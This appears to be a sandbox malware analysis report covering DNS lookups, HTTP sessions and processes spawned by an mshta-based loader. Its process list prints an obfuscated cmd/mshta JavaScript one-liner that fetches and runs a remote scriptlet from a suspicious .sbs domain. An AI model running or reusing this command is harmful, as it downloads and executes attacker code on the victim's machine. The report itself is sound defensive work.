Apr 25, 2024 19:21:55.042365074 CEST | 55006 | 53 | 192.168.2.6 | 1.1.1.1
Apr 25, 2024 19:21:55.189063072 CEST | 53 | 55006 | 1.1.1.1 | 192.168.2.6
Apr 25, 2024 19:21:57.102253914 CEST | 57592 | 53 | 192.168.2.6 | 1.1.1.1
Apr 25, 2024 19:21:57.213151932 CEST | 53 | 57592 | 1.1.1.1 | 192.168.2.6
Apr 25, 2024 19:21:57.717788935 CEST | 64724 | 53 | 192.168.2.6 | 1.1.1.1
Apr 25, 2024 19:21:57.828336000 CEST | 53 | 64724 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 25, 2024 19:21:55.042365074 CEST | 192.168.2.6 | 1.1.1.1 | 0xb5e | Standard query (0) | flinanmansal.roupagucci.sbs | A (IP address) | IN (0x0001) | false
Apr 25, 2024 19:21:57.102253914 CEST | 192.168.2.6 | 1.1.1.1 | 0xce5e | Standard query (0) | www.twitter.com | A (IP address) | IN (0x0001) | false
Apr 25, 2024 19:21:57.717788935 CEST | 192.168.2.6 | 1.1.1.1 | 0xf8d | Standard query (0) | twitter.com | A (IP address) | IN (0x0001) | false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Apr 25, 2024 19:21:55.189063072 CEST1.1.1.1192.168.2.60xb5eNo error (0)flinanmansal.roupagucci.sbs104.21.29.223A (IP address)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:55.189063072 CEST1.1.1.1192.168.2.60xb5eNo error (0)flinanmansal.roupagucci.sbs172.67.149.217A (IP address)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:57.213151932 CEST1.1.1.1192.168.2.60xce5eNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:57.213151932 CEST1.1.1.1192.168.2.60xce5eNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:57.828336000 CEST1.1.1.1192.168.2.60xf8dNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                              • flinanmansal.roupagucci.sbs
                                                                                                                              • www.twitter.com
                                                                                                                              • twitter.com
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.6 | 49699       | 104.21.29.223  | 443              | 5224 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data

2024-04-25 17:21:55 UTC | 310 | OUT |
GET /?1/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: flinanmansal.roupagucci.sbs
Connection: Keep-Alive

2024-04-25 17:21:57 UTC | 836 | IN |
HTTP/1.1 302 Found
Date: Thu, 25 Apr 2024 17:21:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=a6ldflhu07hl1umbkfk37gbbgl; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Location: https://www.twitter.com
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3h%2FTKwL78mEYA%2Bt1WwqcaDE0Wz7RCTjUD3czp1plE8nqEhHo1Zzp%2F3G01otOJRCmv%2BncoFs%2Fo%2BlEA6waxmADNKpm7XBDXwgIn0JCQVwkVtHvgpRtn6rpCOQll%2BW5xuyeelSkn9iOFAvmJYAxbAE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87a00322de0a450f-ATL
alt-svc: h3=":443"; ma=86400

2024-04-25 17:21:57 UTC | 5 | IN |
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.6 | 49700       | 104.244.42.65  | 443              | 5224 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data

2024-04-25 17:21:57 UTC | 295 | OUT |
GET / HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Connection: Keep-Alive
Host: www.twitter.com

2024-04-25 17:21:57 UTC | 361 | IN |
HTTP/1.1 301 Moved Permanently
perf: 7402827104
location: https://twitter.com/
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 440c83396f020cad
x-response-time: 1
x-connection-hash: 1f2c5b04eb47a6033623c550abd8be1e807cb7cfeeb11462e6d54a49049f9926
date: Thu, 25 Apr 2024 17:21:57 GMT
server: tsa_b
connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.6 | 49701       | 104.244.42.65  | 443              | 5224 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data

2024-04-25 17:21:58 UTC | 291 | OUT |
GET / HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Connection: Keep-Alive
Host: twitter.com

2024-04-25 17:21:58 UTC | 5611 | IN |
HTTP/1.1 400 Bad Request
date: Thu, 25 Apr 2024 17:21:58 GMT
perf: 7402827104
expiry: Tue, 31 Mar 1981 05:00:00 GMT
pragma: no-cache
server: tsa_b
set-cookie: guest_id_marketing=v1%3A171406571826624135; Max-Age=63072000; Expires=Sat, 25 Apr 2026 17:21:58 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
set-cookie: guest_id_ads=v1%3A171406571826624135; Max-Age=63072000; Expires=Sat, 25 Apr 2026 17:21:58 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
set-cookie: personalization_id="v1_noUZc8y9gERVKrIGSeM7/w=="; Max-Age=63072000; Expires=Sat, 25 Apr 2026 17:21:58 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
set-cookie: guest_id=v1%3A171406571826624135; Max-Age=63072000; Expires=Sat, 25 Apr 2026 17:21:58 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
set-cookie: ct0=; Max-Age=-1714065717; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=Lax
content-type: text/html; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
last-modified: Thu, 25 Apr 2024 17:21:58 GMT
content-length: 2344
x-frame-options: DENY
x-transaction-id: bf5e8b4770445d36
x-xss-protection: 0
x-content-type-options: nosniff
content-security-policy: connect-src 'self' blob: https://api.x.ai https://api.x.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api.x.com https://api-stream.twitter.com https://api-stream.x.com https://ads-api.twitter.com https://ads-api.x.com https://aa.twitter.com https://aa.x.com https://caps.twitter.com https://caps.x.com https://pay.twitter.com https://pay.x.com https://sentry.io https://ton.twitter.com https://ton.x.com https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://twitter.com https://x.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://accounts.google.com/gsi/status https://accounts.google.com/gsi/log https://checkoutshopper-live.adyen.com wss://*.pscp.tv https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://ads-twitter.com https://analytics.twitter.com https://analytics.x.com ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com https://x.com https://*.x.com https://localhost.twitter.com:3443 https://localhost.x.com:3443; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://x.com https://mobile.twitter.com https://mobile.x.com https://pay.twitter.com https://pay.x.com https://cards-frame.twitter.com https://accounts.google.com/ https://client-api.arkoselabs.com/ https://iframe.arkoselabs.com/ https://vaultjs.apideck.com/ https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; img-src 'self' blob: data: https://*.cdn.twitter.com https://*.cdn.x.com https://ton.twitter.com https://ton.x.com https://*.twimg.com https://analytics.twitter.com https://analytics.x.com https://cm.g.doubleclick.net https://www.google-analytics.com https://maps.googleapis.com https://www.periscope.tv https://www.pscp.tv https://ads-twitter.com https://ads-api.twitter.com https://ads-api.x.com https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://scontent-sea1-1.xx.fbcdn.net https://*.googleusercontent.com https://t.co/1/i/adsct; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://x.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ https://client-api.arkoselabs.com/ https://www.google-analytics.com https://twitter.com https://x.com https://accounts.google.com/gsi/client https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/en_US/appleid.auth.js https://static.ads-twitter.com 'nonce-OTliNjdjYmEtMjUxNS00NzIzLTljMDUtNzAzY2UzNTg0ZDMz'; style-src 'self' 'unsafe-inline' https://accounts.google.com/gsi/style https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false
strict-transport-security: max-age=631138519
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-embedder-policy: unsafe-none
x-response-time: 12
x-connection-hash: 03ccd8c83478b5894e717af3ca4b59793e9bf2d0cd46e08f6acd50f03e656584
connection: close

2024-04-25 17:21:58 UTC | 2344 | IN |
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 20 73 63 72 6f
Data Ascii: <!DOCTYPE html><html dir="ltr" lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0,viewport-fit=cover" /> <style> body { -ms-overflow-style: scro



Target ID: 1
Start time: 19:21:53
Start date: 25/04/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
Imagebase: 0x7ff740920000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 19:21:53
Start date: 25/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 19:21:53
Start date: 25/04/2024
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
Imagebase: 0x7ff6b46e0000
File size: 14'848 bytes
MD5 hash: 0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Memory Dump Source
• Source File: 00000003.00000003.2110034861.000002A68F250000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002A68F250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_3_2a68f250000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction ID: d8d0be1a9444da1f63af68f80fe832121e0c9dd735a3f5ee132c431e26629a42
• Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction Fuzzy Hash: FD9002055994079ED45452D10C5D25C5044A38D160FD84481441690148DD4D429A1153
Uniqueness
Uniqueness Score: -1.00%